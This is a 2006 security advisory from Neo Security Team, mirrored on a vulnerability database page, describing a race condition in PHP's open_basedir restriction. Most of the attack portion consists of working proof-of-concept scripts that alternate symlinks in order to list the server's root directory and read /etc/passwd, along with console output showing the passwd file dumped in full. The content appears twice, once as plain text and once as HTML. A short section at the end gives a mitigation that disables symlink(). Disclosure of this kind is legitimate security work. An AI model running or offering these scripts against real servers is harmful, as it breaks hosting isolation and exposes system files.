Vulners
Lucene search
nst-php-openbasedir.txt
`------=_Part_140466_2216477.1160381991193
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06
--------------------------------------------------------
Program: PHP
Homepage: http://www.php.net
Vulnerable Versions: PHP 3, 4, 5
Risk: High!
Impact: Critical Risk
-==PHP open_basedir with symlink() function Race Condition PoC exploit==-
---------------------------------------------------------
- Description
---------------------------------------------------------
PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.
- Tested
---------------------------------------------------------
localhost - PHP 5.0.4
- Vulnerability Description
---------------------------------------------------------
The vulnerability was discovered by the staff of Hardened-PHP (
www.hardened-php.net). You can see the original advisory
in http://www.hardened-php.net/advisory_082006.132.html.
The point isn't all like the Hardened people said:
"The first script alternates a symbolic link between a file that
is allowed and the one that is forbidden by open_basedir and the
second script simply puts loops around operations trying to
operate on the symbolic link."
We don't need to alternate the symlink beetwen an allowed file an a
forbidden one. In this PoC you can see that the symlink
doesn't point to an allowed file in the loop.
script1.php
<?
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
unlink("dummy");
}
?>
script2.php
<?
@print_r(scandir("/")); // open_basedir restriction doesn't let us to see
the root dir content
// scandir() is a PHP 5 function. You can use another function of the other
versions to work on the directory
while (1) {
$dir=@scandir("xxx");
if (@count($dir) > 20) print_r($dir); // the main dir have more than
20 folders
}
?>
--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 7942
PHP Warning: Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning: Module 'gd' already loaded in Unknown on line 0
PHP Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on
line 2
Warning: file_get_contents(/etc/passwd): failed to open stream: Operation
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
PHP Warning: scandir(): open_basedir restriction in effect. File(/) is not
within the allowed path(s): (/var/www/vhosts/:/tmp/) in
/var/www/vhosts/foo/race_condition/script2.php on line 3
Warning: scandir(): open_basedir restriction in effect. File(/) is not
within the allowed path(s): (/var/www/vhosts/:/tmp/) in
/var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning: scandir(/): failed to open dir: Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
Warning: scandir(/): failed to open dir: Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning: scandir(): (errno 1): Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
Warning: scandir(): (errno 1): Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
Array
(
[0] => .
[1] => ..
[2] => .autofsck
[3] => .autorelabel
[4] => bin
[5] => boot
[6] => chroot
[7] => dev
[8] => etc
[9] => home
[10] => lib
[11] => lib64
[12] => lost+found
[13] => media
[14] => misc
[15] => mnt
[16] => net
[17] => opt
[18] => proc
[19] => root
[20] => sbin
[21] => selinux
[22] => srv
[23] => sys
[24] => tmp
[25] => usr
[26] => var
)
Array
(
[0] => .
[1] => ..
[2] => .autofsck
[3] => .autorelabel
[4] => bin
[5] => boot
[6] => chroot
[7] => dev
[8] => etc
[9] => home
[10] => lib
[11] => lib64
[12] => lost+found
[13] => media
[14] => misc
[15] => mnt
[16] => net
[17] => opt
[18] => proc
[19] => root
[20] => sbin
[21] => selinux
[22] => srv
[23] => sys
[24] => tmp
[25] => usr
[26] => var
)
[root@fc43035 race_condition]#
--Real Proof of Concept exploit--
We finally bypass the open_basedir restriction and we read the main dir
content. Also we can read a file, like /etc/passwd.
In the third line of script1.php we make the symbolic link to ./etc/passwd
so we have to create a folder named "etc" with a
file named "passwd" inside:
[root@fc43035 race_condition]# ls
a etc script1.php script2.php script.php
[root@fc43035 race_condition]# cd etc
[root@fc43035 etc]# ls
passwd
[root@fc43035 etc]# cd ..
[root@fc43035 race_condition]#
Then the script1.php is equal than the first one. We have just to change the
symbolic link to "dummy/../../../../../../etc/passwd".
In the script2.php we try to read the file ("xxx" link) with the
file_get_contents() function.
script1.php
<?
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../etc/passwd", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
unlink("dummy");
}
?>
script2.php
<?
while (1) {
print @file_get_contents("xxx");
}
?>
--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 9979
PHP Warning: Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning: Module 'gd' already loaded in Unknown on line 0
PHP Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on
line 2
Warning: file_get_contents(/etc/passwd): failed to open stream: Operation
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
--Real Proof of Concept exploit--
You can see that the /etc/passwd is readed two times and a lot more if we
don't stop the script execution.
- How to fix it? More information?
--------------------------------------------------------
Like the Hardened-PHP staff said, you have to disallow the use of symlink()
function.
You can do this using the disable_functions directive in your php
configuration (php.ini by default):
disable_functions = ...,symlink;
- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=26
http://www.hardened-php.net/advisory_082006.132.html
- Credits
--------------------------------------------------------
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot]
com
Vulnerability discovered by Hardened-PHP staff (http://www.hardened-php.net)
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/
- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
/* EOF */
------=_Part_140466_2216477.1160381991193
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
/*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06<br>--------------------------------------------------------<br>Program: PHP<br>Homepage: <a href="http://www.php.net">
http://www.php.net</a><br>Vulnerable Versions: PHP 3, 4, 5<br>Risk: High!<br>Impact: Critical Risk<br><br>-==PHP open_basedir with symlink() function Race Condition PoC exploit==-<br>---------------------------------------------------------
<br><br>- Description<br>---------------------------------------------------------<br>PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. <br>
<br>- Tested<br>---------------------------------------------------------<br>localhost - PHP 5.0.4<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>The vulnerability was discovered by the staff of Hardened-PHP (
<a href="http://www.hardened-php.net">www.hardened-php.net</a>). You can see the original advisory<br>in <a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a>
.<br><br>The point isn't all like the Hardened people said:<br><br>"The first script alternates a symbolic link between a file that<br>is allowed and the one that is forbidden by open_basedir and the<br>second script simply puts loops around operations trying to
<br>operate on the symbolic link."<br><br>We don't need to alternate the symlink beetwen an allowed file an a forbidden one. In this PoC you can see that the symlink <br>doesn't point to an allowed file in the loop.<br>
<br>script1.php<br><?<br> symlink("a/a/a/a/a/a/", "dummy");<br> symlink("dummy/../../../../../../", "xxx");<br> unlink("dummy");<br> while (1) {<br> symlink(".", "dummy");
<br> unlink("dummy");<br> }<br>?><br><br>script2.php<br><?<br>@print_r(scandir("/")); // open_basedir restriction doesn't let us to see the root dir content<br>// scandir() is a PHP 5 function. You can use another function of the other versions to work on the directory
<br>while (1) {<br> $dir=@scandir("xxx");<br> if (@count($dir) > 20) print_r($dir); // the main dir have more than 20 folders<br>}<br>?><br><br>--Real Proof of Concept exploit--<br>[root@fc43035
race_condition]# php script1.php &<br>[1] 7942<br>PHP Warning: Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning: Module 'gd' already loaded in Unknown on line 0
<br>PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>PHP Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>PHP Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>Array<br>(<br> [0] => .<br> [1] => ..<br> [2] => .autofsck<br> [3] => .autorelabel<br> [4] => bin<br> [5] => boot<br> [6] => chroot<br> [7] => dev<br> [8] => etc<br>
[9] => home<br> [10] => lib<br> [11] => lib64<br> [12] => lost+found<br> [13] => media<br> [14] => misc<br> [15] => mnt<br> [16] => net<br> [17] => opt<br> [18] => proc
<br> [19] => root<br> [20] => sbin<br> [21] => selinux<br> [22] => srv<br> [23] => sys<br> [24] => tmp<br> [25] => usr<br> [26] => var<br>)<br>Array<br>(<br> [0] => .<br>
[1] => ..<br> [2] => .autofsck<br> [3] => .autorelabel<br> [4] => bin<br> [5] => boot<br> [6] => chroot<br> [7] => dev<br> [8] => etc<br> [9] => home<br> [10] => lib
<br> [11] => lib64<br> [12] => lost+found<br> [13] => media<br> [14] => misc<br> [15] => mnt<br> [16] => net<br> [17] => opt<br> [18] => proc<br> [19] => root<br> [20] => sbin
<br> [21] => selinux<br> [22] => srv<br> [23] => sys<br> [24] => tmp<br> [25] => usr<br> [26] => var<br>)<br><br>[root@fc43035 race_condition]#<br>--Real Proof of Concept exploit--<br><br>
We finally bypass the open_basedir restriction and we read the main dir content. Also we can read a file, like /etc/passwd.<br><br>In the third line of script1.php we make the symbolic link to ./etc/passwd so we have to create a folder named "etc" with a
<br>file named "passwd" inside:<br><br>[root@fc43035 race_condition]# ls<br>a etc script1.php script2.php script.php<br>[root@fc43035 race_condition]# cd etc<br>[root@fc43035 etc]# ls<br>passwd<br>[root@fc43035
etc]# cd ..<br>[root@fc43035 race_condition]#<br><br>Then the script1.php is equal than the first one. We have just to change the symbolic link to "dummy/../../../../../../etc/passwd".<br>In the script2.php we try to read the file ("xxx" link) with the file_get_contents() function.
<br><br>script1.php<br><?<br> symlink("a/a/a/a/a/a/", "dummy");<br> symlink("dummy/../../../../../../etc/passwd", "xxx");<br> unlink("dummy");<br> while (1) {<br>
symlink(".", "dummy");<br> unlink("dummy");<br> }<br>?><br><br>script2.php<br><?<br>while (1) {<br> print @file_get_contents("xxx");<br>}<br>?><br><br>
--Real Proof of Concept exploit--<br>[root@fc43035 race_condition]# php script1.php &<br>[1] 9979<br>PHP Warning: Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning: Module 'gd' already loaded in Unknown on line 0
<br>PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br><br>root:x:0:0:root:/root:/bin/bash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync
<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin
<br>games:x:12:100:games:/usr/games:/sbin/nologin<br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
<br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin<br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin
<br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash<br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
<br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin<br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
<br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin<br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
<br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash<br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br>root:x:0:0:root:/root:/bin/bash
<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>games:x:12:100:games:/usr/games:/sbin/nologin
<br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin<br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin
<br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin<br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
<br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin<br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
<br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin<br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
<br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash<br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
<br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br><br>--Real Proof of Concept exploit--<br><br>You can see that the /etc/passwd is readed two times and a lot more if we don't stop the script execution.
<br><br>- How to fix it? More information?<br>--------------------------------------------------------<br>Like the Hardened-PHP staff said, you have to disallow the use of symlink() function.<br>You can do this using the disable_functions directive in your php configuration (
php.ini by default):<br><br>disable_functions = ...,symlink;<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&id=26">
http://www.neosecurityteam.net/index.php?action=advisories&id=26</a><br><a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a><br><br>- Credits<br>--------------------------------------------------------
<br>Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com<br>Vulnerability discovered by Hardened-PHP staff (<a href="http://www.hardened-php.net">http://www.hardened-php.net</a>)<br><br>[N]eo [S]ecurity [T]eam [NST] -
<a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br>Daemon21<br>Link<br>0m3gA_x<br>LINUX<br>
nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@<br>'@@'@@@@@@''@@@@@@ @@@'''''@@@<br>'@@'''@@@@'''''''''@@@''''@@@
<br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br>
------=_Part_140466_2216477.1160381991193--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4